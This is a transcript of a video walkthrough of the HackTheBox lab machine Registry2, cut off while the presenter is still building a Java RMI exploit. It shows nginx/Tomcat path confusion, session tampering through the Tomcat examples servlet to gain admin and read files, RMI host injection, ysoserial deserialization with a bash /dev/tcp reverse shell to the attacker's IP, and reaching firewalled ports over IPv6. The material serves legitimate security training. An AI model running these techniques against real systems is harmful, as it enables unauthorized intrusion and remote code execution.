What's going on YouTube? This is Ipsec. I'm doing Registry2 from HackTheBox, which was an extremely intimidating box because of all the Java you have to exploit, but it was really well put together and each step built upon the last one, so it was really rewarding to complete. It starts off with the typical nginx Tomcat path traversal of the ... semicolon, and you use that not to access the admin or manager interface, but to access the examples directory that's there by default. And there's a servlet there that lets you modify stuff in your session, and you use that to gain administrator. From there, you do some magic, but there is deserialization with YSOSERIAL you have to do. Then you have to exploit a RMI listener. And then after that, you have to stand up your own RMI server. So when the antivirus thing goes to scan something, it pulls the config from your RMI server, and you give them a dangerous config that leads to it exfilling a bunch of files to a place you can read. There's a lot of ways to go through this box. I'll try to cover them all, but let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it registry2, then the IP address of 10.10.11.223. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTPS on 443. Its banner tells us it's nginx, also running on Ubuntu, and it's redirecting us to www.webhosting.hdb. So I'm going to go ahead real quick and add this to my host file. So sudo v etc host, and then 10.10.11.223, and we'll put this domain in. And then I always like, whenever I have like a www, also putting the parent, so webhosting.hdb, because I don't want to have to specify www every time, right? So it redirects us. We have the certificate say free hosting. Doesn't look like anything else is in the cert here. On port 5000, we also have HTTPS, and its title says it's a Docker Registry API 2.0. Its certificate is just star.webhosting.hdb, but the alternative name is webhosting.hdb twice. That's a bit odd, but we have that. And then 5001, we have, it looks like the same certificate with webhosting.hdb twice. And that is it for nmap. So let's go ahead and take a look at the site. So I'm going to go to https www.webhosting.hdb. And we get the page. If we navigated to, what was it? HTTPS www.webhosting port 5000. Let's accept the certificate. We just get a blank page there and 5001. Let's accept this. We get the Acme Auth server. So when I actually did the box initially, I skipped this whole step on port 5000 and 5001. I'll show you how to skip it when we get there. But let's go and enumerate this now so you see everything this box has to offer. So I would start by just Googling what Acme Auth server is. And we see it's a Docker Registry authentication server. So this is the authentication server. If you look more into it, you'd understand exactly how it works. It's just a very vanilla thing that you stood up, probably in a really bad configuration when we look at it deeper, but let's go ahead and look at port 5000. So I'm going to do a curl-k https 10.10.11.223 port 5000. If we just look at the headers here, it doesn't really tell us that much. We just have a HTTP 200, but if we induced a 404 message, so I'll just do that, we can see we have the Docker distribution API server in the header, registry 2.0. So this is probably how nmap discovered exactly what its purpose is. And if you look more into exactly how the Docker registry works, a lot of it goes under this v2 directory, and when we access it, we get a authentication required. And we can see the header is telling us where to authenticate. It wants us to authenticate to webhosting.hdb port 5001. And the service is the Docker registry service. So if we wanted to, we'd also want to grab the catalog, but this is behind authentication. So let's go make a token. And this is going to be what I'm talking about. The Docker by default is in a horrible configuration. It's more just a development testing thing, right? This is not meant for prod, just running this vanilla like this. Because if I request it, I get a token. But this token actually isn't going to work right away. We have to specify some things, right? So if I specify the header and it's a authorization bearer token, which most of these tokens are when you get it. It's always authorization bearer for APIs. We just get authentication required. I can put it to JQ so it's a bit prettier. And if we wanted to, let's see, I'm going to go to jwt.io and paste this. jwt.io, because this will show us the token a bit better. We can see what it looks like. It's just, again, a JWT. So what we want to do is specify what service we want. And we want the registry catalog permission so we can access the catalog. And then in the actual header, we have the service. So we want 2 parameters in this auth. And you'd have to read all the documentation to understand exactly how this works. But I'm not going to show it since I skipped it. If you want to know, probably check out OXDF straight up. He did it this way, so he understands this much better than I do. But if we just specify the parameters, what is it? We want service is equal to Docker plus registry, because we URL encode it. And then what is the next thing? Was it component or catalog? I may have to go read the documentation anyways. Does it tell us? Name, catalog. Yeah, I'm going to have to go look at the documentation because I forgot the parameter name. So let's see. Let's go over to google.com and I'm going to Google generating Docker auth token. Let's see. We go here. This looks like it's using the Docker binary. I don't want that. Let's see. Curl. This looks better. Oh, here we go. And scrolling, let's see, requesting a token. So we have service, offline, client ID, scope. Scope is what I want. So I'm going to say I want the scope of the registry catalog of everything, I believe. So that will give me the ability to request the catalog, which will show what Dockers are available on the system. We have to put that in single quotes because I have an ampersand. I think we have to do /auth. And that was in the header, right? We have web hosting /auth. I forgot to put that. So we have this token now. Let's try this with our new one. So I'm going to go here and then Control Delete to delete words. I finally have that in my muscle memory. We run it and we can see there is one repository, this hosting app. So if we wanted to, we could try pulling this. So if I do a Docker pull, is it web hosting.htb, port 5000, hosting-app. We have a certificate. And Docker used to have a -- insecure, registry option, but that got removed recently, I believe. So we can't just do like the equivalent of -k to accept the cert. So we have to tell our OS to accept it. So I'm going to download the cert with OpenSSL. So we'll do OpenSSL, client, show certs, connect, web hosting.htb, port 5000. And let's see, do we have it? There it is. So I'm going to grab the cert because this will be the CA certificate. V registry2.cert. I should do like -ca-cert, but oh well. Put it there. And then actually it's .crt. We'll do CA. There we go. So I'm going to move it into user local share CA certificates. And then we want to do a update CA certificate command. So this is going to take all the certificates we have, put them into our central certificate thing where we trust certificates, I guess, on Linux. I don't know a good way to explain that quickly. but I'm just going to now restart the Docker service, because if I don't, it's not going to pull from the new thing, I believe. I think I have to restart the servers. Yeah. So let's do sudo service docker restart. I know I probably should use systemctl restart docker, but pretty much the same thing. And now if I do this docker pull, it's actually going to work and pull this image down. So once we have this Docker image, we will be able to run it. And then we could exec init and start extracting files. What this Docker image is, it's going to be hosting app, which is the web application here, right? So this is going to pretty much conclude the whole Docker section. I just want this download to complete so I can run it. And then I'm going to forget I ever pulled this Docker, and we'll proceed like we never did. I'm going to do docker run hosting -app. Is it -it sh? Hosting app. Let's see. Unable to find image. Do I have to specify Docker images? Docker run hosting. I'm going to put this whole thing in. I don't think I need it. Yeah, I do. Okay. So let's close out of this. I can do a docker ps docker exec -it a926 sh. I just pulled it from here, and now we're in the Docker container. So awesome. I'm just going to kill this. And then let's proceed like we don't even have knowledge of that. So we have this web hosting server. We could run GoBuster. It's not going to help us. So I've already wasted enough time looking around at that Docker thing. So I'm not going to worry about it. The first thing I like doing is looking at the header. So if I curl this -v, we need to do a -k, or I can just go to Burp Suite. Burp Suite would probably be better right now. So let's switch over and start using Burp. So we have that. Let's turn proxy intercept on. If I refresh this page, get back to Burp, examine the headers, let's see what we have. We have the server as nginx and nothing really else here. So we want to try to identify like the underlying technology. And I know we have the Docker, we could just look at it ourselves, but that spoils the fun, right? So I'm going to look at the registration page, and I'm going to register the name. Let's do ipsec root at ipsec.rocks, password of password, and then we'll intercept this request. And something sticks out right now. We have a JSession ID. So we know this is going to be Java on the back end. And if I send this one to repeater, let's see, what's it say? Does it say anything back? No, we just get JSession ID. So we know this is Tomcat behind nginx. And whenever we see that, we always think of some type of like URL confusion thing. Email's taken because I played it in repeater, right? So we've already made this. So let's get out of sign up and let's do sign in. Come on. So let's do root at ipsec.rocks, password of password. So knowing this is Tomcat, there is something we could do here. I'm going to send this over into repeater and we can play with it. So this weird bug happens because nginx is not going to translate this to or nginx. Let me think how to say this. Let's go to orange ssrf nginx Tomcat. This will probably be a good query to pull it up. Turn Burp Suite intercept off. It always goes back to this presentation. Let's see. So what exactly is happening here again? I'm pretty sure when we send this, nginx doesn't treat this as up one directory, but Tomcat does. Because Tomcat's pretty much going to strip off the semicolon, I believe. I bet if you go to like ipsec.rocks, rocks, let's say Tomcat nginx, I would look at this video because I probably go into that much more in depth. The first time I cover things, I tend to remember them better because I spend a lot more time researching it. But now I kind of just take it for granted. When I see Tomcat, I play with this. So if we make a request to dot period, we get a 302, 2 dots, we get a 404, 2 dots and a slash, we go back to hosting. If we put this here, we just get blank. That's completely different. And that indicates that this is vulnerable, right? So we have, again, 404. That is 404 as well. Let's see. Do this, up one directory. I don't know why it was blank there. Maybe it just took a long time to respond. But if we wanted to, we could dir bust things. So this is where you normally go to like /admin and hope the admin is exposed. Manager is another common one. And we can see that is redirecting us to manager HTML. And then we get a unauthorized. So we need to get some type of credentials here. I believe it can also be locked to IP address, maybe. I don't know. But that is one place we can access. There's another one that's in a lot of bug bounties, which is examples. And we can see that redirects us here. So we want to keep in mind, we'll be able to access this examples page. Right? So if I went there, we go to web hosting, semicolon, examples, and make sure you put the trailing slash on it. There's a servlet example, and in this is a very, very dangerous one of the sessions. And this will let us modify the session. We can see our current session says our username is IPSEC, and this is our UUID. So if we start playing in this application, if I go to domains, create new, let's just do please subscribe. If I refresh my session, nothing really changes there. But if I go into this edit button, then something's going to get added to my session, and we'll be able to see that here. See, we see the variable s editing media. So since this is added to my session, it lets me edit it in this examples thing. And this is why examples is a very dangerous thing to include. A lot of the previous HackTheBox machines, we always could just go to like admin or manager and upload a WAR file and get code execution that way. This is a little bit more difficult because those are blacklisted. A lot of places now don't allow loading that, but the examples directory is still there, and we can do really cool things by editing our session, right? So we can see this is pointed at this file. If I go here, that file is going to be this. So if I just pointed this to, let's say, etc passwd, submit the query, then I'm going to refresh this page, and we have the passwd of the server. So we have a pretty cool LFI here, right? Let's go and edit this to be proc self command line. And then I'm going to refresh. And we can see the command line of our process. So I'm going to look at this. So v cmd line. Let's, whoops, paste it like, copy the whole thing. Is it only copying because there's a null byte or something? That's weird. So let's just look at this. We got the Java app. Then we have a logging config. And we could include this, and that's going to tell us how the application's logging. I guess we can. I normally don't look at logging.properties. I normally just do like defaults. But it doesn't really give us that much. We know like, was it user local Tomcat is the location. But I'm going to change my session. Let's now include this logging file, logging.properties, because this may make it a little bit more intuitive. 74 lines. So we can see logging is going to go to /logs, Catalina, 90 days. I'm looking for the file format, maybe because it's 90 days. Let's see. If my rambling doesn't make sense here, it probably will in just a second. So what we want to get is the name of the WAR file. And the WAR file is think of it like a jar file in Java, but it's for web. So it's just a zip of a bunch of Java-y things. And enumerating the processes won't ever leak the WAR name. The best way is to get the Catalina logs, which is just what, I don't know what Catalina exactly means in terms of Tomcat, but the Catalina logs are what you're after. So I think from here we can determine that logs are daily. So either it's going to be in, let's go back here. You'll either want to go, was it user local Tomcat is where we saw the conf. It would be log/catalina.out is one location. And then it can also be Catalina dot and then the log name. And the format is normally, I want to say 2024, that'd be year. And then month will be 01. And then day, today is the 31st, I believe. And I think it's .log when it's specified this way. And then maybe a dash here. Can I just Google this? Google.com, Catalina log file name, year. Let's see. Does it tell us? Catalina dot year dash month dash day. I think that's the format. So let's try grabbing today's Catalina log. So if I submit that, we refresh this. Please say some lines. We have 3 lines. So that did not work. Let's see. What could the log be? Oh, it's not periods between the days. It's dashes, right? If I go over here, there we go, dash. So that was probably my issue. Going to submit the query, refresh. Don't say 3 lines. There we go, 388 lines. So this is going to be the Catalina log, right? It's not the wine mixer, it's the log. So if I'm just going to search for .war, because what I want is WAR files. And we see deployment of the web application archive, user local Tomcat web apps hosting .war. Normally I also try to grab .ear files. I forget exactly what these are, but it's another thing that's common on Tomcat. This doesn't have it. We just have a WAR file. So we just want to grab this one. So I'm going to go back into my session. We'll do S and then grab this and submit the query. So now this file disclosure vulnerability should leak the WAR file name. And since this is going to be a zip, it's going to be huge. I'm going to send it to repeater real quick. Let's copy. I did this so I can right click to copy as a curl item, because when I forward this, it's going to be hard to copy out of this window, right? And I hate doing like the view source thing because the browser is going to get all wonky. So I don't know what file I was in. CMD line. Okay. Let's paste the curl line. I'm going to do -o, and I'm going to call this temp.out real quick. So it's going to download that. We can see this is still trying to load. Oh, probably because I have intercept on. 22 megs, 18,000 lines, and it's going to be printing pretty awful. So, oh shoot, I should not have closed that actually. Oh well. I think we are done with that one for a second because we have the file saved. So if I do v temp.out, we can start carving this file. And one helpful thing when you have a huge file that's going to stem a lot of lines is turn your syntax highlighting off. So syntax off. And I'm just going to delete until we see the file. And it's going to be apparent because that huge A to B blob is the file. So let's delete everything up to that line. And I'm just going slow around it because every now and then it still will be clunky since this file is so big, or this line. So delete like that. I accidentally deleted one too many. There we go. And I'm going to hit the $sign to go to the end of the line. And then it's going to take a hot second for it to go to the end. And 1, 2, 3 X's. Is it going to delete? Come on. There we go. It deleted 1. Delete that. Maybe I should went in insert mode and deleted. I don't know why this is taking so long. I think we're good. I did not see exactly what it did. I blinked and it disappeared. I think there's another option to like disable fancy redraw or something on Vim, because I think it's having a hard time positioning that whole line. I'm going to hit up again. I want to see it still have 2 equals. It has 1 equal. I gave it a second equal, I think. And then I think it has to redraw this whole line. Vim disable redraw. Is that it? Let's see. I forget the exact function, but I think we have it. So let me delete everything. Let's save it. base64-d temp.out. Fix that command, and I'll call it hosting.war. We don't have any error messages, and if I do a file against hosting.war, we have a jar archive. So that is the other way to get this. The intended way, again, boot up that Docker that we had done, and then use, like, spin it up, extract the file out of there. But I think it's funner just to do the file disclosure vulnerability like we showed. So having access to this WAR file, we want to decompile it. And to do that, I'm going to grab JD-GUI. So I'm going to go to Google. We'll do JD-GUI. And that's going to let us open this and view all the good source code of it, right? So I'm going to go to download that version. Let's stick it in HTB registry2. And I'm going to call it JD-GUI.jar. And let's see, I'm going to make a directory bin. I'm going to move all the files I like using in this directory because there's going to be a few other apps we just get. So I'm going to do java-jar JD-GUI to load this up. And then let's do file, open file, up one directory, hosting.war. And let's see, is there a config? I don't see a config to make this font bigger. Oh, sweet. I can just do control. Sweet. So having access to the source code, I'm going to go in webinf, classes, HTTP hosting, and this is going to be where all the code is. I'm going to expand all these so we can look in them. And then where do we want to start? Constants is normally a good thing. You can see all the constants in a file, and we can see the variables like S is user role manager. We didn't see this one, but having access to that examples, we can set our role, which will be pretty cool. Let's see other things we can do. If we go to the authentication servlet, that's another place I would start. You can see when you log in, we have a validate. We set the login UID, displayed username, and then we get the role. And then we also will set this is logged in role manager. Another thing, let's see. I don't know a good way to do this in JD-GUI. If we went to some servlets, we could see like this web servlet, right? I don't know if there's a good just search option. Let's do @webserv. Do we see? Yeah, I don't. So what I'm going to try to do, let's save all source. I'm going to save it here. And then I'm going to open up in VS Code, or we can just grep it because I want to see all URL endpoints. And it like drives me crazy. I can't find like a router file that I'm used to in like any other web language that just has a list of all the routes. They like doing this web servlet thing here. So that drives me crazy, but this is my workaround, right? So make dir source. Let's go in here. I'm going to unzip the hosting war source zip. I'm going to make a directory called hosting, move everything into it because we're probably going to have source of other things, right? And now I can just do a grep command since I have all the source code. Let's just do our web servlet. Is that going to work? Let's see. Web servlet, comma, parenthesis name. There we go. So this will tell us a list of pretty much like the routes. So we have auth sign in, autosave, reconfigure, panels, domains, edit, logout, profile, auth sign up, and view. Reconfigure is one we haven't seen. So if we look at this, that's in the configuration servlet.java. So we can go here, look at reconfigure, and let's see. We do a git. It's going to do this check manager thing. If we click on check manager, it again wants this is logged in role manager. So what we want to do is set this attribute for us. So I'm going to go back into the session example, and let's go back to web hosting panel. I wonder if we won't have to relog in because it's setting the session. So we can see right now we have that. I'm going to set this user logged in manager to true, submit. And now I have that session, and we have a new field, configuration, and then reconfigure. So we can reconfigure something here. We have max domains 5, we could change that. We can change the index template. But if we look, we can actually set any parameter. So it's kind of like a mass assignment thing here. Because if we go back here and save this, let's turn intercept on. We submit. We can see we set these two variables, right? But if we look at the code, what it's doing is it's just getting any parameter we send, putting them in this map, and then updating them. Oh God, I did not mean to click settings. There we go. So since we can edit any setting, we could also edit what the server uses to talk to. There is MySQL somewhere here, but getting code execution through MySQL, it is possible, but it is much, much more challenging. I like using RMI wherever I can. And we see there is a variable here to set RMI.HOST. And we see it does check when it loads this. If RMI.HOST contains .htb, then, or if it doesn't contain .htb, then it's going to set it this way. However, if we put a null byte here, we can include HTTP, but when it uses RMI, like the actual host, it gets terminated. It's just like PHP, right? So what we're going to do is set RMI host, and we're going to point it back at us, and then put a null byte in, and then .htb. So that way it passes this check, but when it goes to connect, it gets terminated at the null byte and goes to our IP address. So this is going to be the much easier way to exploit this. So let's take a look. I'm going to do nc lvnp. What port does it connect to? It looks like 9002. Default RMI is 1099, I believe, and this is just a mapper port. So you connect to the RMI port, it tells you where to go to after that. We'll probably cover that later on in this video, but the mapper is set to 9002 for whatever reason. Thankfully, they didn't do 9001 and just take my reverse shell port. Kudos to the author for not doing that. But yeah, let's see. We want to set the RMI host. So what I'm going to do is we'll do an and then RMI.host is equal to 10.10.14.8. And I guess we can do this first without the null byte, right? So if I did that, and then let's turn this, hold on. I'm going to drop that request. If I did that in the repeater tab and then forward it, it would have deleted it. So I'm just going to turn Burp Suite off real quick because we no longer need it for now. So if I refresh here, we can go domains, click around. I never get a callback because again, that one if then is getting checked and it's resetting it to the HTTP value. But now I'm going to turn repeater. I'm going to do a null byte.htb. We're going to send it. So now we have updated it to set RMI.host is equal to RIP. And then I'm going to refresh this page. Maybe we have to click index. I could have swore I was waiting for a connection. see, what did I do wrong? So we set 10.10.14.8. That is my IP address. NC LVNP 1099. I'm going to listen on that for good measure. Maybe I just need the null byte and don't do .htb. Let's see. What am I missing? We set domains and RMI.host. Let's see. Class RMI.host. I believe that's correct. Let's just append the .htb again and try this again. So we send this. We ought to match. I am listening on 9002. Let's see. Let's go back. There we go. I am not sure what happened before. But now we actually error whenever we try something. Maybe it's when we view a file, right? But now we're getting a connection back to us on this interface. So what we can do is now perform a deserialization attack. And a lot of people at this point use YSOSerial, and I am going to, but one thing I really like nowadays, I know the library is going to be a bit older because it hasn't been updated. You got the default YSOSerial, but when doing RMI exploitation quite a while ago, I forget what exploit made it popular. Maybe it wasn't RMI, maybe it was log4j. I found this YSOSerial-modified library that I absolutely love. And the whole difference is this will allow us to do shell redirection. And they explain it pretty well in this whole description. So the default YSOSerial has the exec running like this. And when you do it this way, you can't really do any type of redirection, which sucks because if you want to do like a one-line shell, you just can't. Or you can, but you have to do a lot of weird escaping maybe. It's not easy to do a one-line shell in the regular version of YSOSerial. What they essentially change it to is like this. So we put the bin bash or bin sh in front of it, -c, and then the command. If your container doesn't have bin sh, so if it's like a Docker Scratch container that's mainly used in Golang applications, you're out of luck. But I don't know many people that use Docker Scratch. So almost always you're going to have a /bin/sh, and then the command is done this way. So now all the redirection works just fine. You don't have to worry about escaping and things like that. So that's why I'm using this YSOSerial modified. Now, the painful thing is there's no exact release, and getting this to run isn't the easiest. So we're going to go to this pull request, and they have a Docker file. So I'm going to pull it from haters repository. And there is going to be even some changes to this one because I guess libraries updated or something. So we'll go make all those changes. So I'm just going to do a git pull on this one, right? Yeah. Git clone, not pull. And then we can go in YSOSerial modified. And then if we do, was it Docker build .-t, I'm going to name it YSOSerial. It's going to pull all the containers down. And then when it tries to build, I'm 90% sure it's going to fail. And there's going to be two small changes we have to make. So I'm going to speed up the video so you don't watch it extract all this. And we'll get to the error message. And we have the first error. So we have could not find artifact JavaX interceptor stuff 3.1. So if we Google this error, and let's see, it's going to tell us we should use 1.2 as the spec instead of 3.1. So we want to find this. So where is this file? I think this is in pom.xml maybe? Yeah. So v pom.xml 3.1, maybe interceptor API, this one, and change 3.1 to, we said 1.2, right? 1.2, saved, and that was -API. So now with that changed, we're going to build it, and it's going to error again. And the next error is going to be related to the Java version, because I think the Java that's in this Docker isn't really supported anymore. So it's not on the Docker hub. And the thing we're going to do is change it to use OpenJDK. The reason why we're just not going to update Java to the latest is there's a bunch of issues on YSOSerial of it just not working with the latest version of Java. I don't know exactly where those issues are, so I can't pull them up, but take my word for it. You want to use an old version of Java with YSOSerial. So I'm going to let this finish. We're going to zip to the end to where the error message is. And here we go. Step 10 out of 13. We have an error, and it says from Java 8 JDK Alpine. It can't find it. And the reason why, again, is this is a old container, so it got deprecated. The answer is not a great one, because we're going to replace Java with OpenJDK. And I say it's not a great one because this repository is also deprecated. So let's rebuild this, and it should build relatively quickly. But the best answer would probably be finding the latest version of Java that YSOSerial supports and switching it to use that one if that's not removed from the Docker registry. But this gets us to where we're working, right? So we have successfully built it and tagged it. So I can do a Docker run and then YSOSerial, and we see the output. So for this, we actually want to use this in a different mode. And by that, let's see, a good way to explain this. The entry point, we're doing java-jar YSOSerial, and that's just going to execute it and hit the main function, which doesn't give us the ability to just execute a call in the jar. So we want to execute it with -cp, which lets us execute specific functions in this that are not exposed to main. So what I'm going to do is find out how to exit Vim, no joke intended. And then let's see, we're going to do that Docker run. I think it's a -entry. I think it's a -point as well, sh. And maybe it's just one thing. Entry point probably goes before YSOSerial. And we probably want to run it in interactive mode. Unknown flag. There we go. So now I'm in just the app. So I can do a java-cp. And before I do that, we want to map a port here. So I'm going to do -p 9002 9002. So what this is going to do is map 9002 on my host to 9002 in this container. So now we can do java cp YSOSerial.jar. And then I don't know a good way to know this other than just reading blog post or knowing what's in it. But we're going to specify the function called YSOSerial exploit JRMP Listener. And we'll do 9002. And then we can specify one of the commons collections. Those are super common in Java. So we'll do commons collections 6. 5 works as well. I'm sure we could look through the source code and then look at the import statements and figure out exactly which one to use. But I like just using 5 or 6. I find them relatively reliable. And then this next one is a YSOSerial-modified ism, I think. This is going to be terminal type. It supports Bash, PowerShell, and CMD, I want to say. It's just how it executes. If you go to the man page on YSOSerial-modified, you'd find out. But if you're on Linux, you probably want Bash. If you're on Windows, you want PowerShell probably, right? And now we can do our one-liner. So we can do bash-i dev tcp 10.10.14.8 9001 0 and 1 like this. So when I run this, we have started the listener. So let's start on 9001. And then I'm going to refresh this page just so we have the RMI host definitely set. We go back here. I'm going to refresh. And we have to log in again. And then I'm probably going to have to set that again. I'm guessing my cookie is invalid. So I edited like the whole session here. I reconfigured it for this JSession ID, I'm guessing. So I have to probably re-edit or grab a new cookie. So let's just go to Burp Suite and turn intercept on, refresh, grab this cookie, go to repeater, paste this in, send it. Uh-oh, we're getting a 302. Oh, because we have to, let's see. Do we edit? We have to give ourselves admin again, right? So let's do examples, servlet, sessions, and then logged on user role manager set to true. So now we have that. Send, no longer a 302. Go to hosting. It's hanging. We see here, we got a connection, read the message sent, and down here, we have a shell. So I'm going to run python 3-c import pty spawn bin bash. No Python. Do we have script? We don't. So we can't actually establish a proper PTY, which kind of sucks. I wonder if I can export term to xterm and still clear the screen. I can't. So that is how we get a shell on this container. And I know it's a container because if we do lsla on /, we have docker env. And what this is going to enable us to do is interact with the host. So lntp, netstat, we can see there's various ports. The really weird thing here is we have host networking enabled in a Docker container because we see we're in Docker environment. If I do an IP address, we can see we're sharing the same network as the host. So we can access anything. But I'm going to get out of the shell because we actually could skip this step. I didn't really talk about it before, but this whole step could also be skipped. And the whole reason it could be skipped is just IPv6. The next step here is going to be interacting with the RMI service itself to get a shell, but we couldn't do that from our host because it's firewalled off, right? We don't have access to hit just port 9002. So if I do nc 10.10.11.223 9002 ZV, it doesn't connect. And we need to be able to hit that port. There's also probably a high number port we'll need to hit, 34409 in this case. But we can't hit either of those because of the firewall. But IPv6, we could. So how do we get IPv6? Well, in the proc directory, this is where like all your tools like ifconfig, IP, and stuff pull information from, right? I think it's in net as well. Let's see. There should be, I'm going to grep for 6. If inet6, I want to say is the file. So we have it here. This is going to be the IPv6 address. We can see the address, the interface, right? So I know I grabbed this from the Docker container. So if I wanted to, we could actually grab it from the hosting panel, right? So I'm going to get rid of this RMI host so we're not sending it all the time. If we go back into the hosting panel, /hosting. Okay, that's fine. We go back to our domains. We start editing something. So I'm going to go edit. We go back here to the session. And then we're going to go editing mode. And then we can say proc net inet _6. Was it? If inet6. If inet6. Submit. Refresh this page. And there we have it. So from this, we could actually now just hit those ports. So let's go back over to where we were trying to do netcats. So let's try 34409 first, right? That fails. But if we do the same thing and add a -6 and then put a port, we have to put the colon. So we can do a colon there. And I know we can simplify the IP address because of all those zeros, which we will do in a second. But there is a colon every 4. So we do that. And what? I wonder if it changed ports on me. Let's do 9002. There we go. So that does change ports. If we go back to this one, 9002, we see it doesn't work. So if we wanted to, we could also simplify this. So you get rid of the zeros, do a double colon. You can only do this once in an IPv6 address, but we do that and it also works. So this is how we could just access the box, the sensitive ports directly, is because the IP tables rule only applied to IPv4 and they didn't apply it to IPv6, which is a somewhat common misconfiguration. I mean, I think I've shown this before. It's on one of my favorite boxes, Sneaky. Let's see, IPv6. We haven't done it much, but yeah, we talk about it quite a bit. And Sneaky was the first box I found it in. And this goes into some things that I learned doing this box. I clicked it because I want to know when this was, right? Because this box was just released, and this was 6 years ago. So again, the misconfiguration can happen quite often. So let's see. Now that we have that port, let's talk about why that port is sensitive and what we're going to do next. So let's go back to the source code. And it's a bit pain to search this, so I'm going to go and open Visual Studio Code again. So source hosting, as I think where it was. Open up VS Code. And it's going to take a second to open. But we just exploited this piece of code, right? There is actual stuff it's doing in RMI. And if we actually communicate to the RMI server, we'll be able to potentially run commands. If the command's not ran on the Docker, if they're ran on the host, then we can escape the Docker this way, right? So we want to examine more about the RMI. So let's see, where are we? So in the file service, it's listing a bunch of functions. So we can upload file, delete, create directory, get file, delete domain, new domain. And in the case of domain, it's talking about the host that we make. Let's see. So if I go back to hosting, it's probably going to want me to log in. And I can disable burp just so it goes a little bit faster. So we'll log back into this. And we have a domain thing here. So this is what it's talking about, domain. And this number right here, string, is going to be the UID or the vhost. But we have all these functions that we can call. Let's see. There was something I wanted to show. This is the piece of decompiled code. We're looking for string is HTTP registry going here. But let's see. Let's just search for upload file and see where this is used. So we'll do find in file, upload file. And if we go to the domain servlet, we can see it's very clear exactly what this is doing because we have the RMI client. It's going to upload the file, the domain, get virtual host, and then upload index.html. This is parameter 1, and this is parameter 2, right? So we have param string 1. We could say vhost, and this one will be file. And then you have bytes, which is the actual file. So I'm going to undo the 2 edits I did because I don't want to change this source too much because it may just break things. But if we go to this one, we can see, again, how to call it, what fields we need. The first argument is going to be the vhost. Then we give it the file name. And I bet if I scroll over here, it's doing a string to get the start template. And that is probably, let's see, this, right? So we should be able to just upload any file we want or do any other command. So let's get started by making this. And the first thing I want to do is fix this package thing because we have this webinf classes com and we don't want that all over our code. So I'm going to copy this and we can say replace in files and we'll replace that with nothing. Okay. So now this looks more like a standard library. And we will, let's see, I'm going to close Visual Studio and then go into the classes directory and open up. So let's go webinf classes, and I can go here. And then we can make a exploit.java and start off our code. So I'm going to create public class. Let's see, all the Java names, capital, I forget casing. We should put a capital E here. Standard Java thing, I think the file name starts with a capital. We can say exploit like that. And we want to make a main function. So I'm going to do public static void main. Then we can say string args and print out hello world. Run. And there we go. We have it. So the one thing I do want to do is have the ability to change the vhost because that is going to change pretty often, I believe. If I go back here, that's going to be this string. So it's a bit of a pain to do arguments when you just click run like I did. So I'm going to have it default to this variable. So we'll say vhost is equal to this. And then I can say if args length is greater or equal to 1, then vhost is equal to the first argument. So now that lets us change it for when we run this on the command line. So now that we have that, we probably want to connect to RMI. So let's see, if we do RMI client wrapper, we just did this get. Let's see, how does it work? RMI host 9002 connecting. I think we could just call this, right? Let's try this. So I want to import com HTTP hosting RMI client wrapper. And then I'm going to say, what is the variable? It's a file service. So maybe file service SVC is equal to this. Does that work? Cannot be resolved to a type. So we got to import that file. Like that. And that just, the value of local variables is not used. So that's just how many service is not used. So now if I do like a service dot, we have all the functions. So let's do list, right? And I'm going to say 1, 2, 3, 4, 5. Yeah, that's fine. Oh, that's going to be a file. We want a directory. So if I just specify this, what is this erroring? Unhandled exception. Try catch. Print stack trace. There we go. And we have to have this return to something, right? Because we're just running this function. This is a list abstract file. So we can say list abstract file. What do we want to call this? Files? That sounds fine. And then we loop it and get the name. Let's see what this does. If we run, it is trying to grab Etsy hosting.ini. Let's see. Hosting.ini. Find in files. So it's got a config file. I don't know if we want to do it this way then. Let's see. We can probably hard code it. So public static file service get. Let's create our own function. Let's see. Wish my auto indenting was working. This has to be indented. That's better. That goes there. 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 Awesome. So I'm going to call this connect RMI, I guess. And we'll pass it two variables. We'll say, do we say strings host name and port? Like that. A method must return the result of a type. Maybe we just have to return. So let's see. We have this. We want to connect to the registry. Like that. Let's see. I'm just doing what it did here, right? And then they return this. Unhandled exception. Throws exception. There we go. So I think we have something similar to what they did. Let's just say connect RMI and then remote registry HTTP port 9002. Does this work? Always continue. Compilation. We got a semicolon somewhere. Have it. There we go. Let's see. This is a TCP error. So what we're going to do is we're going to get this working through IPv6 first because it's just easier and quicker for the video. And then we're going to show doing it through the SOCKS proxy, which I think was the intended way because the whole IPv6 thing is unintended. So let's go, where is the IP address? There it is. Let us grab ETH0, dead beef. Grab this. Okay. And then we can connect to IPv6. Run. What? Still getting registry. Run. Let's run in debug mode. Step over. Oh, I know what's happening. RMI is a mapper. So what's happening is we're connecting to 9002 here. And then when we say we want to list a file, it's giving us a new address. So it's like an HTTP redirect. Think of it that way. And it's putting that remote.registry.htb in. So I'm going to copy the address, go that way. Then let's sudo v etc host and put this address in. We want to copy that. Paste. No. Other paste. There we go. And I bet when we run this now, it will work. Let's see. It did not. Unknown host. Remote.registry.htb. Remote.registry.htb. Ping. Remote registry HTB. We can ping it. Run. Unknown host. Oh, registry.webhosting. Registry. There we go. Helps if I have the correct name. Run. Nested exception is unknown. Dyslexia moment. There's no web hosting. Let's just copy and paste. Okay, create connection. That is embarrassing. I had the wrong host there. Okay. This is no longer an error in the host name. We're just getting a unmarshalling error. Abstract file class invalid for deserialization. Huh. So we do svc list vhost. Do I have the vhost wrong? No, that's set correctly. Right? Yep. We connect. Do we do the loop any different? Is even where is it erroring? Is it erroring at the loop or when we get it? Step over. We've connected. We run this. So we're not even getting to this piece. So our error is here. And I'm not sure why that is. My first thought is our code is correct. And the issue is when we decompiled the library, something got screwed up with this service. So I want to try just making this using the class files so we're not going through any decompilation. So to do that, it's a little bit complex, I guess, but I'm going to, let's see, Let's go back into our source directory. I'm going to make a new one called exploit. And then I'm going to copy the exploit.java into this directory. So we can cp exploit.java here. And then we should have the war file. So we'll do 7zx ... Oh, hold on. Make dir temp 7zx. Let's get the hosting.war in this. One more directory. And then I want to move web classes com to this directory. And then we need a manifest, right? Let's copy the meta manifest up one as well. Okay. And then let's see. That's fine. We just need to put the main class, and that's going to be com HTTP hosting RMI exploit, because that's what we called our file. And we should be able to compile this. So before we do, we have to give this a package. So this will be package com HTTP hosting RMI, I think. So we can compile this with Java C, compile to Java version 8, the source 8, exploit.java. One warning. That should be fine. And then we compile the jar. So jar CFM, give it the file we just created. Oh no. File exploit.java. What command did I run? We did that. Oh, we 